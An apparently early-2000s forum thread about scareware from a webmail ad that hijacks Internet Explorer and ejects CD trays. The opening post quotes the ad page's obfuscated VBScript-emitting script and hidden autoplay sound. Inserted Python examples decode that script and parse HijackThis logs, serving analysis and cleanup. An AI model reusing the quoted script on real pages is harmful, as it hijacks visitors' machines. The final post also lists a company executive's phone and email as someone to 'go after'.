What Next?


JackR


I will spare you the long story (the long story involves a Hijacked Browser, what I had to do in order to refresh a damaged winsock2, and cleaning my system of 99 units of infestations that were deposited in the code of the Ads).

For people who doubt the need for security: the following link is embedded in one of the Ads and currently executes Automatically every time that I log in to my free email service.

Before Clicking, make sure that your CD-ROM is not in use and that the door is free to open.

http://default-homepage-network.com/spypop4.html

EDIT: Link removed and replaced with code only for informational purposes. See Nathan's "Link" below about this scumware. --Fran

Edit: The content of the Link:

WARNING!!
If your cd-rom drive(s) open...
You DESPERATELY NEED to rid your system
of spyware pop-ups IMMEDIATELY!
Spyware programmers can control your
computer hardware if you fail to protect
your computer right at this moment!
Download Spy Wiper NOW!
<i>(See other window)</i></font></b></pre></table>

<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\'+
'u0020\u004c\u0041\u004e\u0047\u0055\u0041\u0047\u0045\u003d\u0022\'+
'u0056\u0042\u0053\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\'+
'u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053\u0065\u0074\u0020\'+
'u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061\'+
'u0074\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\'+
'u004d\u0050\u006c\u0061\u0079\u0065\u0072\u002e\u004f\u0043\u0058\'+
'u002e\u0037\u0022\u0020\u0029\u000d\u000a\u0053\u0065\u0074\u0020\'+
'u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u0020\u003d\'+
'u0020\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\'+
'u0043\u006f\u006c\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u000d\'+
'u000a\u0069\u0066\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+
'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+
'u003e\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\'+
'u000a\u0046\u006f\u0072\u0020\u0069\u0020\u003d\u0020\u0030\'+
'u0020\u0074\u006f\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+
'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+
'u002d\u0020\u0031\u000d\u000a\u0063\u006f\u006c\u0043\u0044\'+
'u0052\u004f\u004d\u0073\u002e\u0049\u0074\u0065\u006d\u0028\'+
'u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074\u000d\u000a\'+
'u004e\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\'+
'u006f\u006d\u000d\u000a\u0045\u006e\u0064\u0020\u0049\u0066\'+
'u000d\u000a\u002d\u002d\u003e\u000d\u000a\u003c\u002f\u0073\'+
'u0063\u0072\u0069\u0070\u0074\u003e')</script>

EDIT: Post has been modified to keep Highlanders from having to scroll horizontally in order to read the posts within this topic. FYI: Originally the script above was on one line as it appears in the webpage it came from. --Fran

<EMBED SRC=http://www.passthison.com/security/security.wav AUTOSTART=true HIDDEN=true LOOP=no>

Edited by LilBambi
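The way an analyst takes apart an obfuscated block like the one quoted above, as an added example that is not part of the original post or of any tool mentioned in this thread: a small Python decoder that reconstructs the text the document.write('\uXXXX...') call emits, then checks the result for the markers that matter here (a VBScript block, CreateObject, the WMPlayer.OCX cdromCollection/Eject interface). The sample input is the snippet from the first post, including the forum's line splits; the marker list and the function names are this example's own assumptions.

```python
import re

# Constructed sample input: the obfuscated <script> block quoted (for
# informational purposes) in the first post of this thread, kept with the
# forum's line splits ( \'+ ' ) exactly as they appear there.
OBFUSCATED_SNIPPET = r"""<script type="text/javascript">document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\'+
'u0020\u004c\u0041\u004e\u0047\u0055\u0041\u0047\u0045\u003d\u0022\'+
'u0056\u0042\u0053\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\'+
'u000a\u003c\u0021\u002d\u002d\u000d\u000a\u0053\u0065\u0074\u0020\'+
'u006f\u0057\u004d\u0050\u0020\u003d\u0020\u0043\u0072\u0065\u0061\'+
'u0074\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0022\u0057\'+
'u004d\u0050\u006c\u0061\u0079\u0065\u0072\u002e\u004f\u0043\u0058\'+
'u002e\u0037\u0022\u0020\u0029\u000d\u000a\u0053\u0065\u0074\u0020\'+
'u0063\u006f\u006c\u0043\u0044\u0052\u004f\u004d\u0073\u0020\u003d\'+
'u0020\u006f\u0057\u004d\u0050\u002e\u0063\u0064\u0072\u006f\u006d\'+
'u0043\u006f\u006c\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u000d\'+
'u000a\u0069\u0066\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+
'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+
'u003e\u003d\u0020\u0031\u0020\u0074\u0068\u0065\u006e\u000d\'+
'u000a\u0046\u006f\u0072\u0020\u0069\u0020\u003d\u0020\u0030\'+
'u0020\u0074\u006f\u0020\u0063\u006f\u006c\u0043\u0044\u0052\'+
'u004f\u004d\u0073\u002e\u0043\u006f\u0075\u006e\u0074\u0020\'+
'u002d\u0020\u0031\u000d\u000a\u0063\u006f\u006c\u0043\u0044\'+
'u0052\u004f\u004d\u0073\u002e\u0049\u0074\u0065\u006d\u0028\'+
'u0069\u0029\u002e\u0045\u006a\u0065\u0063\u0074\u000d\u000a\'+
'u004e\u0065\u0078\u0074\u0020\u0027\u0020\u0063\u0064\u0072\'+
'u006f\u006d\u000d\u000a\u0045\u006e\u0064\u0020\u0049\u0066\'+
'u000d\u000a\u002d\u002d\u003e\u000d\u000a\u003c\u002f\u0073\'+
'u0063\u0072\u0069\u0070\u0074\u003e')</script>"""

# Substrings an analyst would flag in a decoded page script (this example's
# own list): a VBScript block, COM object creation, and the Windows Media
# Player control's cdromCollection / Eject interface.
SUSPICIOUS_MARKERS = (
    'language="vbscript"',
    "createobject(",
    "wmplayer.ocx",
    "cdromcollection",
    ".eject",
)


def decode_unicode_escapes(js_snippet):
    """Recover the text a document.write('...') call built from uXXXX escapes
    would emit. Every uXXXX hex group inside the call's argument is treated as
    an escape, so the forum's line split (backslash, quote, plus) decodes the
    same way the original single-line page did."""
    start = js_snippet.index("document.write(") + len("document.write(")
    end = js_snippet.rindex(")")
    arg = js_snippet[start:end]
    return "".join(chr(int(h, 16)) for h in re.findall(r"u([0-9a-fA-F]{4})", arg))


def find_markers(decoded):
    """Return the suspicious markers present in the decoded text (case-insensitive)."""
    low = decoded.lower()
    return [m for m in SUSPICIOUS_MARKERS if m in low]


def analyse(js_snippet):
    """Decode the snippet and report which markers it contains."""
    decoded = decode_unicode_escapes(js_snippet)
    return decoded, find_markers(decoded)


if __name__ == "__main__":
    text, hits = analyse(OBFUSCATED_SNIPPET)
    print(text.replace("\r\n", "\n"))
    print("flagged markers:", hits)
```

Run it and the decoded text is the plain VBScript the first post warns about: a CreateObject call on the Windows Media Player control, a loop over its cdromCollection and an Eject per drive. That is the whole payload here, which is why JackR and EdP report nothing worse than open trays, and it is also why the same page does nothing in a browser that refuses VBScript and ActiveX, as the thread notes for Mozilla and Netscape.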

nlinecomputers

What website is hosting THAT ad? I want to make sure I NEVER patronize it. And I will gladly forward that to Mike at spywareinfo.com so that more people know about it. I use Mozilla so it didn't work in my preferred browser but it does in IE 6. That is pure crap. Leave my computer alone.... :whistling: ;)


I have the feeling that every Tech support console has a Keyboard with a Huge Red button in the middle. This red button executes a macro that sends an email in response to your complaint stating that you are a computer ignoramus and that's why it happens to you. I emailed my service and got one response that comprised the content of the Red Macro. In addition I was told that they can sell me a package that will clean up my system (probably made by the owner of the Ad that started this infestation). I responded once more with a stronger message. I would not want to divulge the name of the service until I give them more time to clarify the issue.


:whistling: ;) That's a riot! It opened both my drives using IE. I wonder how many will fall for it. No one who uses Netscape will. It doesn't work with Netscape. ;) ;) :o

Edited by EdP

nlinecomputers

This Link is all about this scumware. It uses a browser hijacker to spread its advertising trojan. I understand your reluctance to mention the name of the website advertising this but I would, simply because of the dangers involved. It's not a question of giving the webhost the chance to come clean. This should be done to prevent harm to other users. If any of you guys tested that link then you'd better scan your system, just in case.

Edit: I just scanned my system and it is clean.


Guest LilBambi

Thanks for the Link Nathan, which definitely has a lot of info and some great links including this one: Spyware Warrior. If you look at the January 6 entry, it mentions this particular parasite/scumware and EdP's nemesis -- Clientman!


I would like to add the functional story. Yesterday I logged in to retrieve my email. At the moment that I logged in to the site a Window popped up stating that my system is insecure and that by pressing Enter I would download security software. I am too knowledgeable to fall for such a trap. However ALT Tab seemed to be disabled by this screen and I could not switch away in order to close it. Using CTL ALT DEL and getting the Task Manager worked, but closing IE Explorer and related running processes did not help. Well, I decided to press enter. The results were BAD.

I first ran cleaning programs which reported (on a computer that was totally clean) 99 units of infestations (Reg Entries, DLL files etc.). Notepad opened with a text educating me about the facts of life on the Internet. The CD Tray opened, leaving a Graphical message on the screen and playing an Oh Oh wav. When I finished cleaning I noticed that the Browser was Hijacked; any attempt to manually change the Home page did not work. I ran a clean Reg. program, washed my cache, history etc. and rebooted. Upon reboot I lost my Internet connection. Lucky for me (I am a Big fan of NetBEUI for LAN Sharing) my Network was still working. You guessed right, it is TCP/IP, or to be more precise Winsock2, that was altered. I took care of it. Cleaned once more and everything returned to normal.

But hey, I need my email. I logged in again and presto, the same story. This time I did not press enter, I just switched off the computer. Upon booting I found that just by logging in to the email service (No Clicking, No pressing Enter, No nothing), the Browser was already Hijacked, but there was no infestation and Winsock was intact.

Currently I am waiting for further clarification by the email service.


JackR when you ran SpyBot did it say that you had ClientMan on your system by any chance? From my experience this thing reinstalls itself thru at least two different means. I didn't experience the problem with email but I didn't test that part either. If you have ClientMan I have some steps you can use to remove it.

If any of you guys tested that link then you'd better scan your system, just in case.
HEY, don't scare me like that. :) I ran Adaware and SpyBot and I'm clean.

JackR when you ran SpyBot did it say that you had ClientMan on your system by any chance? From my experience this thing reinstalls itself thru at least two different means. I didn't experience the problem with email but I didn't test that part either. If you have ClientMan I have some steps you can use to remove it.
If any of you guys tested that link then you'd better scan your system, just in case.
HEY, don't scare me like that. ;) I ran Adaware and SpyBot and I'm clean.
Do not worry. That's why I posted the content of the link. I cleaned everything; the Link would only open the CD-Door and play a small wav file. I did not use Spybot. My cleaning cocktail consists of other programs. I do not remember seeing ClientMan. Do you know the precise name of the concerning file? I looked for a file with the structure clie*.* and did not find any.

This issue is not an email issue. The culprit is a Webmail Service, i.e. it occurs by just logging in to mymailsite.com (not the real name). That is what is so alarming about it, since it does not involve opening attachments or clicking on Bizarre links; it occurs by just logging in to a very famous email site before even trying to retrieve the email.

The CD opening is a script, so blocking scripts, or using a browser that does not allow this scripting, would not open the CD-ROM. I usually keep scripting off; however there are more legitimate sites that do use such elements and it is starting to be annoying to enable and disable part of the personal protection system in order to be able to get to where you want to get. Even this BBS at times does not load correctly when NIS is On. I mentioned it to Scott a few days after the BBS started running and for a while it seemed to be OK.

nlinecomputers

Jack, Can you use mail2web.com to get your email? It is not a free email host, only a website that can fetch POP or IMAP based email. If your free mail service allows this you can use that to get your mail. Also, as we have pointed out, Mozilla/Firebird is immune to this kind of hijacking. Another option is to load Spyware Blaster; it may block this kind of hijacking and allow you to get your mail.


Cluttermagnet
Mozilla/Firebird is immune to this kind of hijacking. Another option is to load Spyware Blaster; it may block this kind of hijacking and allow you to get your mail.
Nathan, have you heard about the CWS browser hijack? Merijn/cwschronicles The reason I ask is because it sounds like with the advent of scumware browser hijacks like CWS, the days of immunizing IE are at an end. The bad guys are clever and keeping out in front of Spyware Blaster, Spybot S&D, Adaware, etc. In my view it has finally reached a tipping point where IE has become, to quote a Naderism of a generation or two ago, "unsafe at any speed".

Cluttermagnet

Wow! JackR, I'm sorry to hear about all your problems. I had no idea those free services were getting so dangerous. I still use one, whose name I would also prefer not to mention, but that outfit seems to limit itself to annoying inline ads and trying to spawn popups on their free webpages, all of which I can kill from within Firebird. They run a fairly clean webmail page without any of those annoyances. The bulk of my emailing I do as POP with my ISP server, I'm not that big a fan of webmail anyway, though I do understand how it makes good throwaway email addresses when the spam gets too bad. I hope you decide to give some other browser a shot and give up on IE. I think IE's days are numbered, as there are just too many exploits aimed at it all the time. (Hint: Firebird) ;)


Just read about this same thing happening over at Lockergnome. The resident network guru recommended this: http://members.shaw.ca/techcd/WinsockXPFix.exe

[Directions = It's a zipped file, open it like HJT. Then tick "I know what I'm doing". Then take all instances of nmtracer.dll and move them from the left pane to the right (From "keep" window to "remove" window) and click "finish".]

Anyone tried this? Know anything about it?

Cluttermagnet: I hear you loud and clear. Too many people are having trouble with I.E.


Jack,Can you use mail2web.com to get your email?
I own a few domains and have a webmail/pop3 email on each one of them. It is great and it is totally under my control. I even gave boxes to family and friends so that they can avoid similar troubles as the above. I kept one public free email for a very long time; it gets some of my newsletter subscriptions and I was too lazy to log in to the Newsletters sites and change the address. Well, I guess I am paying for being lazy. ;)

P.S. I hope that my Grandson will not see this thread considering all the lectures on Laziness that he got from me. :D

While this whole scenario really sucks for IE users, there is one thing to keep in mind. While some of these exploits are a product of how IE is designed and how IE functions, no browser is safe. If Firebird was used by 90% of the people on the internet then the focus of these malicious people would switch to Firebird. And do not fool yourselves, Firebird would probably not fare much better than IE under the same scrutiny. Especially considering the source code is there for all to see and learn how to exploit. Don't get me wrong, I am a die hard Firebird user. It is just that no software can stand up to being the target of thousands, if not hundreds of thousands of people who wish to exploit it. Just food for thought folks.


Guest LilBambi
Just read about this same thing happening over at Lockergnome. The resident network guru recommended this: http://members.shaw.ca/techcd/WinsockXPFix.exe [Directions = It's a zipped file, open it like HJT. Then tick "I know what I'm doing". Then take all instances of nmtracer.dll and move them from the left pane to the right (From "keep" window to "remove" window) and click "finish".] Anyone tried this? Know anything about it? Cluttermagnet: I hear you loud and clear. Too many people are having trouble with I.E.
Rons, Cool! Nice to know that other Forums are also recommending this very easy to use tool that just works wonders for XP when the Winsock gets hosed! We have mentioned it in various topics here as well. ;)

Stryder, You are right. No software is immune and although we are enjoying a refreshing reprieve by using other browsers, we need to keep on our toes out there no matter what browser we use! I sure hope that it takes some time for them to get to the Mozilla based browsers since they have such a large base to hit with IE users. :D

nlinecomputers
Mozilla/Firebird is immune to this kind of hijacking. Another option is to load Spyware Blaster; it may block this kind of hijacking and allow you to get your mail.
Nathan, have you heard about the CWS browser hijack? Merijn/cwschronicles The reason I ask is because it sounds like with the advent of scumware browser hijacks like CWS, the days of immunizing IE are at an end. The bad guys are clever and keeping out in front of Spyware Blaster, Spybot S&D, Adaware, etc. In my view it has finally reached a tipping point where IE has become, to quote a Naderism of a generation or two ago, "unsafe at any speed".
I haven't fully read your link but CWS hijacks by using Windows Virtual Machine (Microsoft Java). Mozilla uses Sun Java and thus can't be infected by this. Unless there is a new method I've not heard of. Nothing will last forever but I'm reasonably confident of Mozilla's ability to prevent such attacks. That and I run Spyware Blaster which is a pretty good blocker of such things.

I do not remember seeing ClientMan. Do you know the precise name of the concerning file? I looked for a file with the structure clie*.* and did not find any.
ClientMan consists of several files, ActiveX objects and registry entries. None of which are named "clie*.*" and yes I know what the "*"s represent. This is what I sent to the Ad-aware, SpyBot and HiJack This vendors/authors:
Hi,

There is a new version of ClientMan spyware out. Ad-aware doesn't see it and while SpyBot sees it it doesn't totally remove it, each reboot reinstalls it. I encountered this jewel after Christmas on my neighbor's daughter's pc that she brought home from college for the holidays.

To remove it one must delete the following entities;

O2 - BHO: (no name) - {94927A13-4AAA-476A-989D-392456427688} - C:\WINNT\System32\mseclk.dll
O2 - BHO: (no name) - {95E02C52-05FC-425D-8378-9DA70F9CD763} - C:\WINNT\System32\aadl.dll
O2 - BHO: (no name) - {96BE1D9A-9E54-4344-A27A-37C088D64FB4} - C:\WINNT\System32\mseffm.dll
O2 - BHO: (no name) - {CC916B4B-BE44-4026-A19D-8C74BBD23361} - C:\WINNT\System32\mscdka.dll
O2 - BHO: (no name) - {FCADDC14-BD46-408A-9842-CDBE1C6D37EB} - C:\WINNT\System32\msobfl.dll
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB

The reinstaller,

O4 - HKCU\..\Run: [msmc] C:\WINNT\System32\msccof.exe

can not be removed under Windows even by HiJack This. (Clever these snakes.) However, it can be RENAMED under Windows, effectively disabling it. I renamed it to $$msccof.exe which made it sort high and was easy to find and to manually delete later, but it does not need to be deleted to be deactivated.

hth Ed
The O16 entry appears as a common ActiveX object but it wasn't like anything I'd seen. Attached IMGs are what I saw: ActiveX Control 1.jpg, ActiveX Control 2.jpg, ActiveX Control 3.jpg. ClientMan reappeared even after the msccof file was renamed but stayed gone after the ActiveX file was deleted. In my mind it was the 2nd reinstaller. If you haven't used HiJack This you should. It makes deleting the above Registry entries and files easy. hth
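A parser for the HijackThis entries EdP lists above, added here as an example and not part of any post or of HijackThis itself. It reads O2 (BHO), O4 (Run key) and O16 (DPF) lines into records, then flags entries whose file name matches the ClientMan files from EdP's post, or that are unnamed BHOs loaded from System32 (a heuristic this example assumes, not a rule from the thread). The sample log is constructed from the entries in the post plus one made-up benign Run entry (ExampleTray) so that an unflagged line shows up in the report as well.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample log: the HijackThis entries EdP posted in this thread,
# one per line, plus one constructed benign O4 entry (ExampleTray is a
# made-up name). The O16 URL is truncated exactly as it appears in the post.
SAMPLE_HJT_LOG = r"""
O2 - BHO: (no name) - {94927A13-4AAA-476A-989D-392456427688} - C:\WINNT\System32\mseclk.dll
O2 - BHO: (no name) - {95E02C52-05FC-425D-8378-9DA70F9CD763} - C:\WINNT\System32\aadl.dll
O2 - BHO: (no name) - {96BE1D9A-9E54-4344-A27A-37C088D64FB4} - C:\WINNT\System32\mseffm.dll
O2 - BHO: (no name) - {CC916B4B-BE44-4026-A19D-8C74BBD23361} - C:\WINNT\System32\mscdka.dll
O2 - BHO: (no name) - {FCADDC14-BD46-408A-9842-CDBE1C6D37EB} - C:\WINNT\System32\msobfl.dll
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB
O4 - HKCU\..\Run: [msmc] C:\WINNT\System32\msccof.exe
O4 - HKLM\..\Run: [ExampleTray] C:\Program Files\Example\tray.exe
"""

# File names EdP associated with this ClientMan variant (taken from the post).
CLIENTMAN_FILES = {"mseclk.dll", "aadl.dll", "mseffm.dll", "mscdka.dll", "msobfl.dll", "msccof.exe"}

# One regex per HJT line type handled here.
O2_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - (?P<clsid>\{[0-9A-Fa-f-]+\}) - (?P<path>.+)$")
O4_RE = re.compile(r"^O4 - (?P<hive>HK[A-Z]+)\\\.\.\\Run: \[(?P<name>[^\]]*)\] (?P<path>.+)$")
O16_RE = re.compile(r"^O16 - DPF: (?P<clsid>\{[0-9A-Fa-f-]+\}) - (?P<path>.+)$")


@dataclass
class Entry:
    kind: str             # "O2", "O4" or "O16"
    name: str             # BHO display name, Run value name, or "" for O16
    clsid: Optional[str]  # CLSID for O2/O16, None for O4
    path: str             # DLL/EXE path or download URL
    reasons: List[str] = field(default_factory=list)

    @property
    def filename(self):
        # Local paths use backslashes, download URLs use slashes.
        return re.split(r"[\\/]", self.path)[-1].lower()


def parse_hjt(log_text):
    """Parse O2/O4/O16 lines of an HJT log into Entry objects; other lines are ignored."""
    entries = []
    for line in log_text.splitlines():
        line = line.strip()
        if m := O2_RE.match(line):
            entries.append(Entry("O2", m["name"], m["clsid"], m["path"]))
        elif m := O4_RE.match(line):
            entries.append(Entry("O4", m["name"], None, m["path"]))
        elif m := O16_RE.match(line):
            entries.append(Entry("O16", "", m["clsid"], m["path"]))
    return entries


def flag_entries(entries):
    """Attach review reasons to entries; returns only those that got at least one."""
    flagged = []
    for e in entries:
        if e.filename in CLIENTMAN_FILES:
            e.reasons.append("file name matches the ClientMan variant from EdP's post")
        # Heuristic assumed by this example: a BHO with no display name that
        # lives in System32 is worth a look even when its file name is new.
        if e.kind == "O2" and e.name == "(no name)" and "\\system32\\" in e.path.lower():
            e.reasons.append("unnamed BHO loaded from System32 (heuristic)")
        if e.reasons:
            flagged.append(e)
    return flagged


if __name__ == "__main__":
    for e in flag_entries(parse_hjt(SAMPLE_HJT_LOG)):
        print(f"{e.kind:<3} {e.filename:<12} {'; '.join(e.reasons)}")
```

The report lists the five BHO DLLs and the msccof.exe Run entry; the O16 codec download and the made-up tray entry pass through unflagged. Matching on file names alone is only as good as the list, which is EdP's point about renamed reinstallers: the unnamed-BHO heuristic is there to catch the next variant that uses fresh names in the same place.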

While some of these exploits are a product of how IE is designed and how IE functions, no browser is safe. If Firebird was used by 90% of the people on the internet then the focus of these malicious people would switch to Firebird. And do not fool yourselves, Firebird would probably not fare much better than IE under the same scrutiny. Especially considering the source code is there for all to see and learn how to exploit.
Words of Wisdom. If all the energy that is spent in the eternal (and Silly) battle, and bashing,

Microsoft Vs. Linux
Intel Vs. AMD
nVidia Vs. ATI (and many more)

would be directed toward the people who dish us the Junk, it may be a better world. Instead many of us choose the easy target which is the people who actually provide us with working tools.

This might also be helpful in the ever quest for Damage Control: http://cexx.org/lspfix.htm

It was a long day. Thank you every one for your support.

Edit: EdP Thanks. I just finished searching my system for the Clientman "Junk". Did not find any at the moment. ;)

nlinecomputers

Well just to keep the browser wars going.... :thumbsup: IE has six or seven security holes that have yet to be fixed. Most security holes that show up in Mozilla or Firebird are rapidly addressed. It is difficult to get M$ to even ADMIT to a hole let alone do something about it. Personally I'd take the openness of addressing security problems in open source over the closed, cover up and ignore it, mentality of Microsoft any day.


I agree Nathan - at least Mozilla/Firebird is always coming out with updated new versions while IE is stuck in Limbo till Longhorn. BTW the new IE is dreadfully ugly too.


JackR, Agree - but .................... who am I supposed to go after? Give me a name and address and I will guarantee they will no longer bother any of us! :P I hear what you are saying - it just gets frustrating sometimes. :lol:


Doesn't anybody run IE in a High security state anymore? I'm seeing a lot of chatter about hijacked browsers lately.
IE should be run in "Medium" security mode and *nothing* lower. The settings shouldn't even allow you to use a lower setting for the "Internet" zone.

Doesn't anybody run IE in a High security state anymore? I'm seeing a lot of chatter about hijacked browsers lately.
IE should be run in "Medium" security mode and *nothing* lower. The settings shouldn't even allow you to use a lower setting for the "Internet" zone.
We forget that the world out there is Big. Some organizations use the browser for Intranet browsing with no liaison to the Internet. Under such an arrangement they can enjoy better than Medium.

BTW, my Browser is set to medium with a few manual additions toward High Security. Putting it straight on High deems the Internet almost unusable. As I mentioned before, many nice docile sites will not load correctly with High settings since almost no one any more uses just clean basic HTML. After all, how can you have a site without a few things bouncing here and there?

I surf behind a Router and software Firewall, as well as an Active Virus protector and Cookie-Pal. (I can take this load using a 2.8GHz machine with a 4Mb/sec. Broadband Connection.) I have been an Internet user since the inception of the Internet. I run an Adware type of program at the end of each day; rarely I find a few Reg. entries that need to be cleaned. This is the first time that something of this magnitude happens to me.

Rons, you wanted to know who to go after. I have that info for you. From my blog post here: http://www.netrn.net/archives2/000309.html and here: http://www.netrn.net/archives2/000221.html

Mail Wiper, Inc.
8725 Roswell Road, #104
Atlanta, GA 30350
FAX: 770-518-1519
PHONE: 770-642-1117
CEO Rob Martinson
Rob's telephone number: 770-642-1117
Rob's email: rob@mailwiper.com

Nothing would make me happier than to see this s c u m w a r e company go down! :blink:

